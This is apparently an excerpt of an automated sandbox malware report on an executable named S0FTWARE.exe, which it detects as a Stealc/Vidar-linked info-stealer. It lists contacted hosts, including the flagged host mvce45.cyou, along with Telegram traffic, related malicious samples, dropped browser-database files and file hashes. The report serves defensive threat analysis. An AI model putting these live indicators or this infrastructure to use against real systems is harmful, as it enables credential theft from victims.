                                                                                                                                                                                                                      https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000007.00000003.2114645411.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116267973.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2126794662.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116897074.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109108414.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109131079.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2110583766.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109177552.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2112515732.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://mvce45.cyou/sBitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://issuetracker.google.com/issues/166475273msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://tidal.com/5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://docs.google.com/presentation/:chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 13.107.246.63 | s-part-0035.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 20.25.227.174 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 13.107.246.40 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 18.165.220.106 | sb.scorecardresearch.com | United States | 3 | MIT-GATEWAYSUS | false |
| 152.195.19.97 | unknown | United States | 15133 | EDGECASTUS | false |
| 20.189.173.2 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false |
| 162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false |
| 172.217.21.36 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 23.44.203.23 | unknown | United States | 20940 | AKAMAI-ASN1EU | false |
| 94.245.104.56 | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | United Kingdom | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 2.16.158.185 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 23.44.203.16 | unknown | United States | 20940 | AKAMAI-ASN1EU | false |
| 142.250.65.225 | unknown | United States | 15169 | GOOGLEUS | false |
| 49.13.32.95 | mvce45.cyou | Germany | 24940 | HETZNER-ASDE | true |
                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.8
                                                                                                                                                                                                                                  127.0.0.1
                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1560256
                                                                                                                                                                                                                                  Start date and time:2024-11-21 15:46:11 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 8m 58s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:23
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Sample name:S0FTWARE.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@64/255@22/19
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                                                                  • Number of executed functions: 90
                                                                                                                                                                                                                                  • Number of non-executed functions: 149
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 192.229.221.95, 172.217.21.35, 172.217.17.46, 173.194.76.84, 34.104.35.123, 13.107.21.239, 204.79.197.239, 13.107.42.16, 204.79.197.203, 13.107.6.158, 2.20.68.234, 2.20.68.198, 51.137.3.145, 2.19.198.147, 2.19.198.121, 104.126.37.34, 104.126.37.19, 104.126.37.24, 104.126.37.26, 104.126.37.40, 104.126.37.27, 104.126.37.25, 104.126.37.33, 104.126.37.32, 2.18.40.144, 2.18.40.146, 2.18.40.148, 2.18.40.147, 2.18.40.142, 2.18.40.143, 2.18.40.137, 2.18.40.149, 2.18.40.136, 204.79.197.237, 13.107.21.237, 13.74.129.1, 172.165.69.228, 142.250.80.67, 142.251.32.99, 142.251.40.163
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, prod-agic-we-2.westeurope.cloudapp.azure.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, wildcardtlu-ssl.azureedge.net, a1834.dscg2.akamai.net, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager
                                                                                                                                                                                                                                  • Execution Graph export aborted for target S0FTWARE.exe, PID 8056 because there are no executed function
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: S0FTWARE.exe
Time | Type | Description
09:48:04 | API Interceptor | 1x Sleep call for process: BitLockerToGo.exe modified
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  13.107.246.63https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      20.25.227.174file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • www.aib.gov.uk/
                                                                                                                                                                                                                                                                          NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/3zs
                                                                                                                                                                                                                                                                          PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/42Q
                                                                                                                                                                                                                                                                          06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/3zk
                                                                                                                                                                                                                                                                          Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 2s.gg/3zM
                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                          t.meqaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          https://account.metasystemchat.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                                                                          eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 46.105.201.240
                                                                                                                                                                                                                                                                          https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 46.105.201.240
                                                                                                                                                                                                                                                                          Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          SOfQumBuFd.exeGet hashmaliciousBinder HackTool, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          https://page-speed-2950.my.salesforce-sites.com/supportGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 104.26.6.129
                                                                                                                                                                                                                                                                          chrome.cloudflare-dns.comwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          test2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          test2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                                                                          ssl.bingadsedgeextension-prod-europe.azurewebsites.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                          • 94.245.104.56
                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                          Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                                                                                                                          • 2.16.229.162
                                                                                                                                                                                                                                                                          • 40.126.53.18
                                                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
                                                                                                                                                                                                                                                                          z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                          • 49.13.32.95
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\freebl3.dll
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
E89hSGjVrv.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
C:\ProgramData\mozglue.dll
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
E89hSGjVrv.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
file.exe | Get hash | malicious | Stealc, Vidar | Browse
file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 155648
Entropy (8bit): 0.5407252242845243
Encrypted: false
SSDEEP: 96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5: 7B955D976803304F2C0505431A0CF1CF
SHA1: E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256: 987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512: CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious: false
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):9976
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.499944288613473
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                                                                                                                                                                                                                                                                                  MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                                                                                                                                                                                                                                                                                  SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                                                                                                                                                                                                                                                                                  SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                                                                                                                                                                                                                                                                                  SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                                                                                                                                                                                                                                                                                  Malicious:false
